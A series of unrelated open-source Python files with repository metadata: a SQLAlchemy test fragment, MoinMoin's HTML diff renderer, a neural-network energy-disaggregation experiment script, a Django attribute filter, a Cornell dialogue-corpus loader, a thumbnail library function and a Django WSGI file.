row = s.query(self.classes.Foo, self.classes.Bar).from_self().all()[0]
def go():
eq_(row.Foo.id, 1)
eq_(row.Foo.bar_id, 2)
eq_(row.Bar.id, 3)
# all three columns are loaded independently without
# overlap, no additional SQL to load all attributes
self.assert_sql_count(testing.db, go, 0)
|
alex/sqlalchemy
|
test/orm/test_froms.py
|
Python
|
mit
| 95,771
|
# -*- coding: iso-8859-1 -*-
"""
MoinMoin - Side by side diffs
@copyright: 2002 Juergen Hermann <jh@web.de>,
2002 Scott Moonen <smoonen@andstuff.org>
@license: GNU GPL, see COPYING for details.
"""
from MoinMoin.support import difflib
from MoinMoin.wikiutil import escape
def indent(line):
eol = ''
while line and line[0] == '\n':
eol += '\n'
line = line[1:]
stripped = line.lstrip()
if len(line) - len(stripped):
line = " " * (len(line) - len(stripped)) + stripped
#return "%d / %d / %s" % (len(line), len(stripped), line)
return eol + line
# This code originally by Scott Moonen, used with permission.
def diff(request, old, new, old_top='', new_top='', old_bottom='', new_bottom='', old_top_class='', new_top_class='', old_bottom_class='', new_bottom_class=''):
""" Find changes between old and new and return
HTML markup visualising them.
@param old: old text [unicode]
@param new: new text [unicode]
@param old_top: Custom html for adding on top of old revision column (optional)
@param old_bottom: Custom html for adding at bottom of old revision column (optional)
@param new_top: Custom html for adding on top of new revision column (optional)
@param new_bottom: Custom html for adding at bottom of new revision column (optional)
@param old_top_class: Custom class for <td> with old_top content (optional)
@param new_top_class: Custom class for <td> with new_top content (optional)
@param old_bottom_class: Custom class for <td> with old_bottom content (optional)
@param new_bottom_class: Custom class for <td> with new_bottom content (optional)
"""
_ = request.getText
t_line = _("Line") + " %d"
seq1 = old.splitlines()
seq2 = new.splitlines()
seqobj = difflib.SequenceMatcher(None, seq1, seq2)
linematch = seqobj.get_matching_blocks()
result = """
<table class="diff">
"""
if old_top or new_top:
result += '<tr><td class="%s">%s</td><td class="%s">%s</td></tr>' % (old_top_class, old_top, new_top_class, new_top)
if len(seq1) == len(seq2) and linematch[0] == (0, 0, len(seq1)):
# No differences.
result += '<tr><td class="diff-same" colspan="2">' + _("No differences found!") + '</td></tr>'
else:
result += """
<tr>
<td class="diff-removed"><span>%s</span></td>
<td class="diff-added"><span>%s</span></td>
</tr>
""" % (_('Deletions are marked like this.'), _('Additions are marked like this.'), )
lastmatch = (0, 0)
# Print all differences
for match in linematch:
# Starts of pages identical?
if lastmatch == match[0:2]:
lastmatch = (match[0] + match[2], match[1] + match[2])
continue
llineno, rlineno = lastmatch[0]+1, lastmatch[1]+1
result += """
<tr class="diff-title">
<td>%s:</td>
<td>%s:</td>
</tr>
""" % (request.formatter.line_anchorlink(1, llineno) + request.formatter.text(t_line % llineno) + request.formatter.line_anchorlink(0),
request.formatter.line_anchorlink(1, rlineno) + request.formatter.text(t_line % rlineno) + request.formatter.line_anchorlink(0))
leftpane = ''
rightpane = ''
linecount = max(match[0] - lastmatch[0], match[1] - lastmatch[1])
for line in range(linecount):
if line < match[0] - lastmatch[0]:
if line > 0:
leftpane += '\n'
leftpane += seq1[lastmatch[0] + line]
if line < match[1] - lastmatch[1]:
if line > 0:
rightpane += '\n'
rightpane += seq2[lastmatch[1] + line]
charobj = difflib.SequenceMatcher(None, leftpane, rightpane)
charmatch = charobj.get_matching_blocks()
if charobj.ratio() < 0.5:
# Insufficient similarity.
if leftpane:
leftresult = """<span>%s</span>""" % indent(escape(leftpane))
else:
leftresult = ''
if rightpane:
rightresult = """<span>%s</span>""" % indent(escape(rightpane))
else:
rightresult = ''
else:
# Some similarities; markup changes.
charlast = (0, 0)
leftresult = ''
rightresult = ''
for thismatch in charmatch:
if thismatch[0] - charlast[0] != 0:
leftresult += """<span>%s</span>""" % indent(
escape(leftpane[charlast[0]:thismatch[0]]))
if thismatch[1] - charlast[1] != 0:
rightresult += """<span>%s</span>""" % indent(
escape(rightpane[charlast[1]:thismatch[1]]))
leftresult += escape(leftpane[thismatch[0]:thismatch[0] + thismatch[2]])
rightresult += escape(rightpane[thismatch[1]:thismatch[1] + thismatch[2]])
charlast = (thismatch[0] + thismatch[2], thismatch[1] + thismatch[2])
leftpane = '<br>'.join([indent(x) for x in leftresult.splitlines()])
rightpane = '<br>'.join([indent(x) for x in rightresult.splitlines()])
# removed width="50%%"
result += """
<tr>
<td class="diff-removed">%s</td>
<td class="diff-added">%s</td>
</tr>
""" % (leftpane, rightpane)
lastmatch = (match[0] + match[2], match[1] + match[2])
if old_bottom or new_bottom:
        result += '<tr><td class="%s">%s</td><td class="%s">%s</td></tr>' % (old_bottom_class, old_bottom, new_bottom_class, new_bottom)
result += '</table>\n'
return result
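# Illustrative call (editorial note, not part of the original module): assuming the
# enclosing function is MoinMoin's ``diff(request, old, new, **kw)`` helper documented
# above, a theme could embed the rendered comparison like this:
#
#   html = diff(request, old_text, new_text,
#               old_top='<a href="?rev=1">Revision 1</a>',
#               new_top='<a href="?rev=2">Revision 2</a>')
#
# The return value is a complete ``<table class="diff">`` fragment.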
|
Glottotopia/aagd
|
moin/local/moin/build/lib.linux-x86_64-2.6/MoinMoin/util/diff_html.py
|
Python
|
mit
| 5,991
|
import platform
def is_windows():
"""Returns true if current platform is windows"""
return any(platform.win32_ver())
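# Illustrative usage (editorial, not part of the original module):
#   if is_windows():
#       print("Running on Windows")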
|
huvermann/MyPiHomeAutomation
|
HomeAutomation/thingUtils.py
|
Python
|
mit
| 125
|
from __future__ import print_function, division
import matplotlib
import logging
from sys import stdout
matplotlib.use('Agg') # Must be before importing matplotlib.pyplot or pylab!
from neuralnilm import (Net, RealApplianceSource,
BLSTMLayer, DimshuffleLayer,
BidirectionalRecurrentLayer)
from neuralnilm.source import standardise, discretize, fdiff, power_and_fdiff
from neuralnilm.experiment import run_experiment, init_experiment
from neuralnilm.net import TrainingError
from neuralnilm.layers import MixtureDensityLayer
from neuralnilm.objectives import (scaled_cost, mdn_nll,
scaled_cost_ignore_inactive, ignore_inactive,
scaled_cost3)
from neuralnilm.plot import MDNPlotter, CentralOutputPlotter
from lasagne.nonlinearities import sigmoid, rectify, tanh
from lasagne.objectives import mse, binary_crossentropy
from lasagne.init import Uniform, Normal
from lasagne.layers import (LSTMLayer, DenseLayer, Conv1DLayer,
ReshapeLayer, FeaturePoolLayer, RecurrentLayer)
from lasagne.updates import nesterov_momentum, momentum
from functools import partial
import os
import __main__
from copy import deepcopy
from math import sqrt
import numpy as np
import theano.tensor as T
NAME = os.path.splitext(os.path.split(__main__.__file__)[1])[0]
#PATH = "/homes/dk3810/workspace/python/neuralnilm/figures"
PATH = "/data/dk3810/figures"
SAVE_PLOT_INTERVAL = 500
GRADIENT_STEPS = 10
source_dict = dict(
filename='/data/dk3810/ukdale.h5',
appliances=[
['fridge freezer', 'fridge', 'freezer'],
'hair straighteners',
'television'
# 'dish washer',
# ['washer dryer', 'washing machine']
],
on_power_thresholds=[5] * 5,
min_on_durations=[60, 60, 60, 1800, 1800],
min_off_durations=[12, 12, 12, 1800, 600],
window=("2013-06-01", "2014-07-01"),
seq_length=1024,
# random_window=64,
output_one_appliance=False,
boolean_targets=False,
train_buildings=[1],
validation_buildings=[1],
# skip_probability=0.8,
one_target_per_seq=False,
n_seq_per_batch=16,
subsample_target=4,
include_diff=False,
include_power=True,
# clip_appliance_power=True,
target_is_prediction=False,
# independently_center_inputs = True,
standardise_input=True,
unit_variance_targets=True,
input_padding=2,
lag=0
# classification=True
# reshape_target_to_2D=True
# input_stats={'mean': np.array([ 0.05526326], dtype=np.float32),
# 'std': np.array([ 0.12636775], dtype=np.float32)},
# target_stats={
# 'mean': np.array([ 0.04066789, 0.01881946,
# 0.24639061, 0.17608672, 0.10273963],
# dtype=np.float32),
# 'std': np.array([ 0.11449792, 0.07338708,
# 0.26608968, 0.33463112, 0.21250485],
# dtype=np.float32)}
)
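# Editorial note (not in the original script): the source draws 1024-sample windows
# from UK-DALE building 1 (2013-06-01 to 2014-07-01), standardises the inputs, and
# subsamples the target sequences by a factor of 4, matching the strided Conv1D used
# in exp_a() below.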
N = 50
net_dict = dict(
save_plot_interval=SAVE_PLOT_INTERVAL,
# loss_function=partial(ignore_inactive, loss_func=mdn_nll, seq_length=SEQ_LENGTH),
# loss_function=lambda x, t: mdn_nll(x, t).mean(),
loss_function=lambda x, t: mse(x, t).mean(),
# loss_function=lambda x, t: binary_crossentropy(x, t).mean(),
# loss_function=partial(scaled_cost, loss_func=mse),
# loss_function=ignore_inactive,
# loss_function=partial(scaled_cost3, ignore_inactive=False),
updates_func=momentum,
learning_rate=1e-1,
learning_rate_changes_by_iteration={
1000: 1e-2,
# 400: 1e-3,
# 800: 1e-4
# 500: 1e-3
# 4000: 1e-03,
# 6000: 5e-06,
# 7000: 1e-06
# 2000: 5e-06
# 3000: 1e-05
# 7000: 5e-06,
# 10000: 1e-06,
# 15000: 5e-07,
# 50000: 1e-07
},
do_save_activations=True
# auto_reshape=False,
# plotter=CentralOutputPlotter
# plotter=MDNPlotter
)
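# Editorial note (not in the original script): training minimises plain MSE with
# momentum updates, starting at a learning rate of 1e-1 and dropping to 1e-2 after
# 1000 iterations; layer activations are saved for inspection (do_save_activations=True).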
def exp_a(name):
global source
source_dict_copy = deepcopy(source_dict)
source = RealApplianceSource(**source_dict_copy)
net_dict_copy = deepcopy(net_dict)
net_dict_copy.update(dict(
experiment_name=name,
source=source
))
output_shape = source.output_shape_after_processing()
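    # Editorial note (not in the original script): the stack below is
    # BLSTM -> dimshuffle to (batch, features, time) -> strided Conv1D that
    # downsamples the sequence by a factor of 4 -> dimshuffle back -> BLSTM ->
    # softplus dense layer giving one non-negative output per appliance.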
net_dict_copy['layers_config'] = [
{
'type': BLSTMLayer,
'num_units': 40,
'gradient_steps': GRADIENT_STEPS,
'peepholes': False
},
{
'type': DimshuffleLayer,
'pattern': (0, 2, 1)
},
{
'type': Conv1DLayer,
'num_filters': 20,
'filter_length': 4,
'stride': 4,
'nonlinearity': sigmoid
},
{
'type': DimshuffleLayer,
'pattern': (0, 2, 1)
},
{
'type': BLSTMLayer,
'num_units': 80,
'gradient_steps': GRADIENT_STEPS,
'peepholes': False
},
{
'type': DenseLayer,
'num_units': source.n_outputs,
'nonlinearity': T.nnet.softplus
}
]
net = Net(**net_dict_copy)
return net
def main():
# EXPERIMENTS = list('abcdefghijklmnopqrstuvwxyz')
EXPERIMENTS = list('a')
for experiment in EXPERIMENTS:
full_exp_name = NAME + experiment
func_call = init_experiment(PATH, experiment, full_exp_name)
logger = logging.getLogger(full_exp_name)
try:
net = eval(func_call)
run_experiment(net, epochs=100000)
except KeyboardInterrupt:
logger.info("KeyboardInterrupt")
break
except Exception as exception:
logger.exception("Exception")
# raise
finally:
logging.shutdown()
if __name__ == "__main__":
main()
|
mmottahedi/neuralnilm_prototype
|
scripts/e362.py
|
Python
|
mit
| 5,901
|
from django import template
from django.template.defaultfilters import stringfilter
from django.utils.html import conditional_escape
from django.utils.safestring import mark_safe
from usermgmt import utils
register = template.Library()
@register.filter(is_safe=True)
@stringfilter
def render_attributes(value, autoescape=True):
"""A filter for changing a list of user attributes into a list of links,
data, etc.
"""
# TODO
# @makyo 2016-11-06 #63
if value == '':
return 'No attributes'
to_return = '<dl>'
for attribute in value.split('\n'):
k, v = attribute.split('=', 1)
if k in utils.ATTRIBUTES:
to_return += '<dt>{}</dt>'.format(utils.ATTRIBUTES[k]['dt'])
to_return += '<dd>{}</dd>'.format(
utils.ATTRIBUTES[k]['dd'].format(value=conditional_escape(v)))
to_return += '</dl>'
return mark_safe(to_return)
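# Illustrative template usage (editorial; ``profile.attributes`` is an assumed field):
#   {% load profile_extras %}
#   {{ profile.attributes|render_attributes }}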
|
makyo/honeycomb
|
usermgmt/templatetags/profile_extras.py
|
Python
|
mit
| 914
|
import os
import ast
"""
Load the Cornell Movie-Dialogs Corpus.
Available from here:
http://www.cs.cornell.edu/~cristian/Cornell_Movie-Dialogs_Corpus.html
"""
class CornellData:
"""
"""
def __init__(self, dirName):
"""
Args:
dirName (string): directory where to load the corpus
"""
self.lines = {}
self.conversations = []
MOVIE_LINES_FIELDS = ["lineID","characterID","movieID","character","text"]
MOVIE_CONVERSATIONS_FIELDS = ["character1ID","character2ID","movieID","utteranceIDs"]
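        # Editorial note: the ``dirName`` argument is immediately overridden by the
        # hard-coded path below, so the corpus is always loaded from
        # /usr/share/dragonfire/deepconv/.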
dirName = "/usr/share/dragonfire/deepconv/"
self.lines = self.loadLines(os.path.join(dirName, "movie_lines.txt"), MOVIE_LINES_FIELDS)
self.conversations = self.loadConversations(os.path.join(dirName, "movie_conversations.txt"), MOVIE_CONVERSATIONS_FIELDS)
# TODO: Cleaner program (merge copy-paste) !!
def loadLines(self, fileName, fields):
"""
Args:
fileName (str): file to load
            fields (list<str>): fields to extract
Return:
dict<dict<str>>: the extracted fields for each line
"""
lines = {}
with open(fileName, 'r', encoding='iso-8859-1') as f: # TODO: Solve Iso encoding pb !
for line in f:
values = line.split(" +++$+++ ")
# Extract fields
lineObj = {}
for i, field in enumerate(fields):
lineObj[field] = values[i]
lines[lineObj['lineID']] = lineObj
return lines
def loadConversations(self, fileName, fields):
"""
Args:
fileName (str): file to load
            fields (list<str>): fields to extract
        Return:
            list<dict>: the extracted fields for each conversation
"""
conversations = []
with open(fileName, 'r', encoding='iso-8859-1') as f: # TODO: Solve Iso encoding pb !
for line in f:
values = line.split(" +++$+++ ")
# Extract fields
convObj = {}
for i, field in enumerate(fields):
convObj[field] = values[i]
# Convert string to list (convObj["utteranceIDs"] == "['L598485', 'L598486', ...]")
lineIds = ast.literal_eval(convObj["utteranceIDs"])
# Reassemble lines
convObj["lines"] = []
for lineId in lineIds:
convObj["lines"].append(self.lines[lineId])
conversations.append(convObj)
return conversations
def getConversations(self):
return self.conversations
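# Illustrative usage (editorial, not part of the original module):
#   data = CornellData("/usr/share/dragonfire/deepconv/")
#   for conversation in data.getConversations():
#       first_utterance = conversation["lines"][0]["text"]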
|
mertyildiran/Dragonfire
|
dragonfire/deepconv/corpus/cornelldata.py
|
Python
|
mit
| 2,691
|
# -*- coding: utf-8 -*-
from thumbnails.conf import settings
from thumbnails.engines import DummyEngine
from thumbnails.helpers import get_engine, generate_filename, get_cache_backend
from thumbnails.images import SourceFile, Thumbnail
__version__ = '0.5.1'
def get_thumbnail(original, size, **options):
"""
Creates or gets an already created thumbnail for the given image with the given size and
options.
    :param original: File path, URL or base64-encoded string of the image that you want a
        thumbnail of.
    :param size: String with the wanted thumbnail size, of the form ``200x200``, ``200`` or
        ``x200``.
    :param crop: Crop setting, one of ``center``, ``top``, ``right``, ``bottom``, ``left``.
    :param force: If set to ``True`` the thumbnail will be created even if it already exists.
:param quality: Overrides ``THUMBNAIL_QUALITY``, will set the quality used by the backend while
saving the thumbnail.
:param scale_up: Overrides ``THUMBNAIL_SCALE_UP``, if set to ``True`` the image will be scaled
up if necessary.
:param colormode: Overrides ``THUMBNAIL_COLORMODE``, The default colormode for thumbnails.
Supports all values supported by pillow. In other engines there is a best
effort translation from pillow modes to the modes supported by the current
engine.
:param format: Overrides the format the thumbnail will be saved in. This will override both the
detected file type as well as the one specified in ``THUMBNAIL_FALLBACK_FORMAT``.
:return: A Thumbnail object
"""
engine = get_engine()
cache = get_cache_backend()
original = SourceFile(original)
crop = options.get('crop', None)
options = engine.evaluate_options(options)
thumbnail_name = generate_filename(original, size, crop)
if settings.THUMBNAIL_DUMMY:
engine = DummyEngine()
return engine.get_thumbnail(thumbnail_name, engine.parse_size(size), crop, options)
cached = cache.get(thumbnail_name)
force = options is not None and 'force' in options and options['force']
if not force and cached:
return cached
thumbnail = Thumbnail(thumbnail_name, engine.get_format(original, options))
if force or not thumbnail.exists:
size = engine.parse_size(size)
thumbnail.image = engine.get_thumbnail(original, size, crop, options)
thumbnail.save(options)
for resolution in settings.THUMBNAIL_ALTERNATIVE_RESOLUTIONS:
resolution_size = engine.calculate_alternative_resolution_size(resolution, size)
image = engine.get_thumbnail(original, resolution_size, crop, options)
thumbnail.save_alternative_resolution(resolution, image, options)
cache.set(thumbnail)
return thumbnail
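# Illustrative usage (editorial; the file path is an assumed example):
#   thumbnail = get_thumbnail('path/to/image.jpg', '300x300', crop='center')
#   # ``thumbnail`` is a Thumbnail object created (or fetched from cache) by the
#   # configured engine, using the size and crop options given above.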
|
relekang/python-thumbnails
|
thumbnails/__init__.py
|
Python
|
mit
| 2,899
|
"""
WSGI config for mords_backend project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "mords_backend.settings")
application = get_wsgi_application()
|
TeppieC/M-ords
|
mords_backend/mords_backend/wsgi.py
|
Python
|
mit
| 404
|